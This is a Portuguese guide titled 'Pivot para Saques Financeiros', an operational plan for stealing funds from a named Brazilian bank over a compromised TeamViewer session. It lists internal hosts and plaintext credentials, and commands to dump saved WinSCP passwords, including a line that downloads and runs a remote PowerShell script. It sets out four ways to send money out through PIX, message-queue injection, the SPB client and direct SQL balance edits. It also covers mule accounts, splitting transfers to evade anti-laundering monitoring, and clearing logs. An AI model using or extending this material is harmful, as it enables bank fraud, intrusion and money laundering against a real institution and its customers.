Pular para o conteúdo
Digite para buscar
navegar Enter abrir / buscar Busca local · Pagefind + fuzzy

20 — Pivot para Saques Financeiros — Guia Didático

ONDE ESTAMOS AGORA (Ponto de Partida)

Você está aqui:
┌─────────────────────────────────────────────────┐
│ TeamViewer → Máquina Windows do banco │
│ IP local: rede 192.168.10.x │
│ User: Administrador │
│ O que tem: WinSCP com sessões salvas │
│ SQL Server instalado │
│ SecureClient Sinqia 6.2.0 │
│ CFI_BASILEIA.bak (153 MB) │
└─────────────────────────────────────────────────┘

A LÓGICA DO PIVOT (Por que isso leva a dinheiro)

Entenda a cadeia:

TeamViewer (acesso visual)
Máquina Windows (dentro da rede do banco)
├── WinSCP → 192.168.10.225 (Sinqia Debian)
│ │
│ ├── Sqctrl (painel de controle Sinqia)
│ ├── Artemis (fila de mensagens SPB/PIX)
│ └── Keycloak (autenticação SSO)
├── WinSCP → 192.168.10.113 (Novo Sinqia)
│ │
│ └── Core Banking (operações do banco)
├── SQL Server local (databases financeiras)
└── SecureClient 6.2.0 (aplicação SPB instalada)
└── Conecta ao BACEN via rede RTM
└── PIX / TED / DOC / SELIC

Explicação simples:

  1. Sinqia = é o “cérebro” do banco. Toda operação financeira (PIX, TED, SELIC, custódia) passa por ele
  2. Sqctrl = é o “painel de controle” do Sinqia. Quem controla isso, controla o banco
  3. Artemis = é o “carteiro” que entrega mensagens ao BACEN/SPI. As ordens de pagamento passam por aqui
  4. SecureClient = é o “aplicativo” que o funcionário usa pra operar o SPB. Está instalado na máquina
  5. RTM = é a “estrada” privada que conecta o banco ao Banco Central

Resumo: Você tem acesso à máquina que OPERA o sistema de pagamentos do banco.


CAMINHOS PARA SAQUE — 4 VIAS

VIA 1: SQCTRL → PIX DIRETO (Mais Rápido)

Passo a passo:
1. No WinSCP, conectar em 192.168.10.225 (sessão já salva)
- Ou via browser: http://192.168.10.225:8080 (Sqctrl web interface)
- Ou: http://sqctrl:8080 (hostname interno)
2. Login no Sqctrl:
- User: sysclassico01 / Bcclassico123456789
- Ou via Keycloak: admin / Admin$2025
3. No Sqctrl, localizar módulo de PAGAMENTOS ou SPI/PIX
4. Iniciar transferência PIX:
- Conta origem: Conta PI do banco (Conta de Pagamentos Instantâneos)
- Conta destino: Conta de "laranja" ou empresa controlada
- Valor: Até R$50M (saldo estimado da Conta PI)

Por que funciona: O Sqctrl é a interface administrativa. Quem tem admin, pode autorizar pagamentos sem precisar de segundo fator — é sistema para sistema, não pessoa para pessoa.

Risco: Logs internos registram a operação. BACEN vê em tempo real.


VIA 2: ARTEMIS → INJEÇÃO DE MENSAGEM PIX (Mais Stealth)

Passo a passo:
1. Acessar 192.168.10.225 via SSH (admjackson/Sqctrl@2025 ou eysadmin/[extrair do WinSCP])
2. Acessar console do Artemis:
- http://192.168.10.225:8161/console (porta padrão ActiveMQ)
- Ou: http://artemis:8161/console
3. Localizar filas (queues) do SPI:
- Fila de SAÍDA (mensagens enviadas ao BACEN): queue.spi.out / queue.pix.send
- Fila de ENTRADA (respostas do BACEN): queue.spi.in / queue.pix.recv
4. Injetar mensagem pacs.008 na fila de SAÍDA:
- Formato: XML ISO 20022
- Tipo: pacs.008.001.XX (Credit Transfer)
- O banco assina com certificado SPB antes de enviar

Por que funciona: O Artemis é o message broker. Se você coloca uma mensagem na fila de saída, o sistema pega e envia ao BACEN automaticamente, como se fosse uma operação legítima. O sistema assina com o certificado SPB (que está no servidor) automaticamente.

Risco: Precisa craftar XML válido no formato ISO 20022. Mensagem mal formatada é rejeitada pelo SPI.


VIA 3: SECURECLIENT → OPERAÇÃO MANUAL (Mais Simples)

Passo a passo:
1. Na máquina Windows (via TeamViewer), abrir SecureClient 6.2.0
- Já está instalado em C:\...\SecureClient\
2. SecureClient conecta ao servidor Sinqia automaticamente
- Endpoint: provavelmente 192.168.10.225 ou .113
3. Login no SecureClient:
- User: provável sysclassico01 / Bcclassico123456789
- Ou: admjackson / Sqctrl@2025
- Ou: jackson / [alguma senha do padrão]
4. Dentro do SecureClient:
- Menu: Pagamentos → SPB → Nova Mensagem
- Ou: PIX → Transferência → Nova
- Preencher: valor, conta destino, motivo
- Confirmar e enviar

Por que funciona: É LITERALMENTE como o funcionário do banco faz no dia-a-dia. Você está usando a mesma aplicação, na mesma máquina, na mesma rede. Do ponto de vista do sistema, é uma operação normal.

Risco: O SecureClient pode ter controles de horário, alçada (valor máximo por usuário), dupla aprovação.


VIA 4: SQL SERVER → MANIPULAÇÃO DIRETA DO BANCO DE DADOS (Nuclear)

Passo a passo:
1. Na máquina Windows, abrir SQL Server Management Studio
- Já está instalado (pasta "SQL Server Managem..." visível)
2. Conectar ao banco de dados:
- Server: localhost OU 192.168.10.132 (SERVER02)
- Auth: sysbancoclassico / BCO01cla
- Ou: sa / Bcclassico123456789
3. Localizar tabelas de SALDOS e TRANSAÇÕES:
- SELECT * FROM dbo.ContaCorrente WHERE ...
- SELECT * FROM dbo.Transacoes ORDER BY data DESC
- SELECT * FROM pix.t410rcon (tabela PIX de reconciliação)
4. ALTERAR saldos diretamente:
- UPDATE dbo.ContaCorrente SET saldo = saldo + 1000000 WHERE conta = 'XXX'
- INSERT INTO dbo.Transacoes (tipo, valor, destino, ...) VALUES ('TED', 5000000, ...)
5. Ou EXTRAIR dados para planejar melhor:
- Listar todas as contas e saldos
- Ver histórico de transações
- Identificar contas com saldo alto
- Ver limites operacionais

Por que funciona: O SQL Server É o banco de dados real. Alterar dados lá = alterar a “realidade” que o banco conhece. Se você altera o saldo, o sistema acredita que o saldo é aquele.

Risco ALTO: Logs SQL, triggers de auditoria, reconciliação diária com BACEN vai mostrar inconsistência. Funciona por horas/dias até alguém perceber.


QUAL VIA ESCOLHER?

ViaVelocidadeStealthComplexidadeValor Máximo
1. SqctrlMinutosBaixoMédio~R$50M (Conta PI)
2. ArtemisMinutosMédioAlto (precisa XML)~R$50M
3. SecureClientMinutosAlto (parece legítimo)BaixoDepende da alçada
4. SQL diretoImediatoBaixíssimoMédioIlimitado (mas detectável)

RECOMENDAÇÃO: Via 3 (SecureClient) primeiro para entender a interface e limites. Via 1 (Sqctrl) se precisar de volume maior sem aprovação dupla.


PREPARAÇÃO ANTES DE EXECUTAR

1. Extrair Senha do WinSCP (Primeira coisa a fazer)

Terminal window
:: No CMD da máquina Windows (via TeamViewer):
:: Ver se WinSCP salva em INI ou Registry
dir "%APPDATA%\WinSCP.ini" 2>nul && type "%APPDATA%\WinSCP.ini"
:: Se não tiver INI, está no registry:
reg query "HKCU\Software\Martin Prikryl\WinSCP 2\Sessions" /s
:: Procurar campo "Password" - será algo como:
:: Password REG_SZ A3B4C5D6E7F8...

O campo Password é XOR cipher. Para decriptar precisa:

  • Hostname (ex: 192.168.10.225)
  • Username (ex: eysadmin)
  • Password field (hex string do registro)

Decoder: https://github.com/anoopengineer/winscppasswd

Ou rodar direto na máquina:

Terminal window
# SessionGopher (PowerShell) - extrai todas as senhas salvas
IEX(New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/Arvanaghi/SessionGopher/master/SessionGopher.ps1')
Invoke-SessionGopher -Thorough

2. Mapear o Que Está Rodando

Terminal window
:: Ver databases SQL locais
sqlcmd -S localhost -E -Q "SELECT name FROM sys.databases"
:: Ver serviços Sinqia
sc query | findstr /i "sinqia secureclient sqctrl"
:: Ver conexões de rede ativas
netstat -an | findstr "225\|113\|132\|ESTABLISHED"
:: Ver processos
tasklist | findstr /i "secure java sinqia artemis"

3. Testar Acesso ao Sqctrl (via browser da própria máquina)

Terminal window
:: Abrir no browser da máquina:
start http://192.168.10.225:8080
start http://sqctrl:8080
start https://192.168.10.225:8443
:: Se não abrir, verificar portas:
telnet 192.168.10.225 8080
telnet 192.168.10.225 8161
telnet 192.168.10.225 8443

4. Verificar Saldo Disponível (SQL)

-- Conectar: sysbancoclassico / BCO01cla no SERVER02 (192.168.10.132)
-- Ou: sa / Bcclassico123456789 no Cloud RTM
-- Ver saldo da Conta PI (PIX)
SELECT * FROM dbo.ContaPI;
SELECT * FROM pix.t410rcon;
-- Ver saldo de contas
SELECT TOP 100 * FROM dbo.ContaCorrente ORDER BY saldo DESC;
-- Ver últimas transações PIX
SELECT TOP 50 * FROM pix.t410chpx ORDER BY data_hora DESC;

5. Preparar Conta Destino

Antes de enviar qualquer valor, precisa de:

  • Conta bancária em outro banco (laranja ou empresa)
  • Chave PIX da conta destino (CPF, CNPJ, email, telefone ou aleatória)
  • Valor abaixo do radar: PIX > R$100k pode ser flaggeado no COAF
  • Horário: Dentro do expediente SPI (24/7, mas transferências fora de horário comercial podem chamar atenção no monitoramento interno)

FLUXO COMPLETO — DO TEAMVIEWER AO SAQUE

┌─ FASE 1: RECONHECIMENTO (Agora) ─────────────────────────────┐
│ │
│ [TeamViewer] → [Máquina Windows] │
│ │ │
│ ├── Extrair senhas WinSCP (registry) │
│ ├── Listar databases SQL │
│ ├── Testar Sqctrl no browser │
│ ├── Verificar SecureClient instalado │
│ └── Netstat → ver conexões ativas │
│ │
└────────────────────────────────────────────────────────────────┘
┌─ FASE 2: ACESSO AOS SISTEMAS FINANCEIROS ─────────────────────┐
│ │
│ [Sqctrl Web] → Login com sysclassico01 │
│ │ │
│ ├── Navegar menus: Pagamentos, SPB, PIX │
│ ├── Verificar saldo Conta PI │
│ ├── Verificar limites/alçadas │
│ └── Entender fluxo de aprovação │
│ │
│ [SecureClient] → Login na aplicação desktop │
│ │ │
│ ├── Testar operações em HOMOLOGAÇÃO primeiro │
│ └── Entender campos obrigatórios │
│ │
│ [SQL Server] → SELECT saldos, contas, limites │
│ │ │
│ └── Mapear toda a estrutura antes de agir │
│ │
└────────────────────────────────────────────────────────────────┘
┌─ FASE 3: EXECUÇÃO ────────────────────────────────────────────┐
│ │
│ Opção A (PIX via Sqctrl): │
│ 1. Login Sqctrl │
│ 2. Módulo PIX → Nova transferência │
│ 3. Conta origem: Conta PI do Banco Clássico │
│ 4. Chave destino: [chave PIX do destino] │
│ 5. Valor: R$ X (considerar limites) │
│ 6. Confirmar → Sistema envia ao SPI automaticamente │
│ 7. Dinheiro cai em segundos na conta destino │
│ │
│ Opção B (TED via SQL + Sinqia): │
│ 1. INSERT mensagem TED na fila │
│ 2. Sistema processa e envia via STR/CIP │
│ 3. Cai em D+0 (mesmo dia) ou D+1 │
│ │
└────────────────────────────────────────────────────────────────┘
┌─ FASE 4: PÓS-EXECUÇÃO ───────────────────────────────────────┐
│ │
│ 1. Saque/transferência imediata na conta destino │
│ 2. Limpar logs se possível (SQL, Sinqia, Windows Event) │
│ 3. Desconectar TeamViewer │
│ 4. Não reconectar na mesma máquina │
│ │
└────────────────────────────────────────────────────────────────┘

CONTROLES QUE PODEM BLOQUEAR

ControleO que éComo verificarBypass
AlçadaLimite de valor por usuárioVer no Sqctrl/SecureClient perfil do userUsar user admin (sem limite) ou dividir em valores menores
Dupla aprovaçãoPrecisa 2 pessoas pra aprovarTestar envio de valor pequeno primeiroSe admin = auto-aprova. Ou aprovar com segunda conta
HorárioOperações só em horário comercialTestar. PIX é 24/7 no SPIExecutar em horário comercial (9h-17h BRT)
COAFMonitoramento anti-lavagemValores > R$50k podem ser flaggeadosFraccionar em valores menores (R$30-40k cada)
ReconciliaçãoBanco confere saldos todo diaAcontece geralmente de madrugadaExecutar e sacar antes da reconciliação
CertificadoMensagem SPB precisa assinaturaVerificar se cert JDTRANSFER está no serverSe Sqctrl envia, ele assina automaticamente

NÚMEROS REAIS DESTE BANCO

MétricaValorFonte
Conta PI (PIX)~R$50M estimadoDoc 15
Caixa totalR$13,4 bilhõesDoc 14
Carteira açõesR$27 bilhões (B3)Doc 13
Títulos SELICBilhõesDoc 14
PatrimônioR$23,4 bilhõesDoc 14

Realidade: O banco tem MUITO dinheiro. Mas a maior parte está em AÇÕES e TÍTULOS (não é líquido imediato). O que está disponível para saque imediato via PIX/TED:

  • Conta PI: ~R$50M
  • Conta reservas: potencialmente centenas de milhões (mas TED, não PIX)

RESUMO — PRÓXIMOS PASSOS (em ordem)

AGORA (na máquina via TeamViewer):
1. reg query "HKCU\Software\Martin Prikryl\WinSCP 2\Sessions" /s
2. sqlcmd -S localhost -E -Q "SELECT name FROM sys.databases"
3. Abrir browser → http://192.168.10.225:8080 (ou http://sqctrl:8080)
4. netstat -an | findstr "ESTABLISHED"
5. dir "C:\Program Files\SecureClient*" /s /b

Cada resposta desses comandos determina qual VIA usar.